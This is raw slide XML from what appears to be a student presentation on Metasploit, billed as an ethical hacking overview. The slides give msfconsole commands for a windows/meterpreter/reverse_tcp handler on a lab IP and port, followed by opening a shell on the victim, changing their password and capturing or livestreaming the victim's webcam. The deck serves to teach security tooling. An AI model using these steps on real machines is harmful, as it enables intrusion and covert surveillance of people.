                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD1AF603-8756-F76D-FF10-A3D6C758682A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="4219074"/>
            <a:ext cx="1457528" cy="1171739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1428516157"/>
      </p:ext>
    </p:extLst>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DB4676-99BC-71CF-8D37-408B28A43B22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="408373" y="435006"/>
            <a:ext cx="11239129" cy="5965794"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now our payload is ready after this we will go to another terminal and we will turn on one</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Simple python http server with the command </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>python -m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http.server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 8080 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After executing it should look like this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Now open another terminal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>There you type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> which will start the Metasploit framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65AED5AB-9252-94B5-DBF0-D057C092D597}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="408373" y="2885999"/>
            <a:ext cx="5115639" cy="1086002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED8CD011-C122-B0CA-31CE-D8FBE7911A50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="408373" y="5098688"/>
            <a:ext cx="3391373" cy="762106"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="696531336"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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3D257-D307-C896-1D79-7F319D3F5656}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="674703" y="487770"/>
            <a:ext cx="10670959" cy="5882459"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now type this command </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use exploit/multi/handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set payload windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 192.168.95.149</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 1234</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D80660AB-459E-1394-2381-4A29294496F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="674703" y="4123517"/>
            <a:ext cx="5706271" cy="2095792"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3545013004"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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85B7EF-B9A4-1777-2C26-964841DC6127}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="807868" y="559293"/>
            <a:ext cx="10582182" cy="5610688"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After clicking on exploit it will wait for the victim to execute the payload and the payload will connect to the attackers machine using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  protocol and it will look like this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now you can see that the session is opened now if I type shell in the terminal </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It will open the terminal of the victims machine like this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B97E95B2-D48A-A159-308A-B564FE219709}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="801950" y="1947987"/>
            <a:ext cx="7878274" cy="866896"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91E0E097-7BD4-4745-B377-1E1B3BE066D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="801950" y="4203577"/>
            <a:ext cx="5001323" cy="2505425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3934249605"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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18EBE-F3F0-A7D2-2D90-3942823E1ACF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="332510"/>
            <a:ext cx="9905999" cy="5631872"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now we can do anything on the terminal even we can change his password also</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After this let’s look at some scary stuff if we type help in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> it will give us the options that what we can do with the victims machine like this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AE779DE-977A-1312-7D4F-24CB2552A547}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="1911927"/>
            <a:ext cx="5438820" cy="4810990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2007483493"/>
      </p:ext>
    </p:extLst>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AB46-E4EF-3706-BEC8-74BB4EE0DDF0}"/>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21B847A9-BEF4-B412-B3CA-23DA550B2E05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4123371" cy="6858000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{492FC422-7FF0-D7FE-26FC-23BA9569CFB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4123371" y="0"/>
            <a:ext cx="4355611" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE577120-8E63-4DED-3865-EB68159099A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8478982" y="0"/>
            <a:ext cx="3713018" cy="6763215"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1557516712"/>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9527-5952-8055-F871-44B28ECA1082}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1146705" y="1"/>
            <a:ext cx="9586398" cy="1997476"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Black" panose="020B0A02040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI Black" panose="020B0A02040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Metasploit: An Overview of an Ethical Hacking Tool</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4400" b="1" dirty="0">
              <a:latin typeface="Segoe UI Black" panose="020B0A02040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Segoe UI Black" panose="020B0A02040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0467F349-0D5E-EE58-790D-7AA3096BFB23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1146705" y="2249485"/>
            <a:ext cx="3856037" cy="4544175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>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r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>21BCE1163 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>Sandip Datta</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{734D8EA6-9C64-5274-7FC9-2E79F93204B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4210875" y="1997477"/>
            <a:ext cx="3458058" cy="3391373"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2105138508"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:comb/>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D7091-C8F6-DB8B-8AC3-CEF81433A5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ECF364-9A3B-64F8-039F-AA9C93670991}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="618518"/>
            <a:ext cx="9905999" cy="5792673"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now we will see the demo for webcam the command is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webcam_snap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>The image will get saved in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>attcakers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>After this we can do live stream also which will open the attackers machine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> browser and will livestream from victims camera</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9636A2D-8D76-AB8A-7AD3-7D7816E4E2AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141411" y="1100948"/>
            <a:ext cx="4163006" cy="790685"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{740A4ACA-6C69-35BB-CDBC-16BFCF195AB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141411" y="2836779"/>
            <a:ext cx="1038370" cy="876422"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BB96270-8240-5F3F-26C3-63FDFB5CC83A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141411" y="5058564"/>
            <a:ext cx="4010585" cy="1105054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1813388780"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
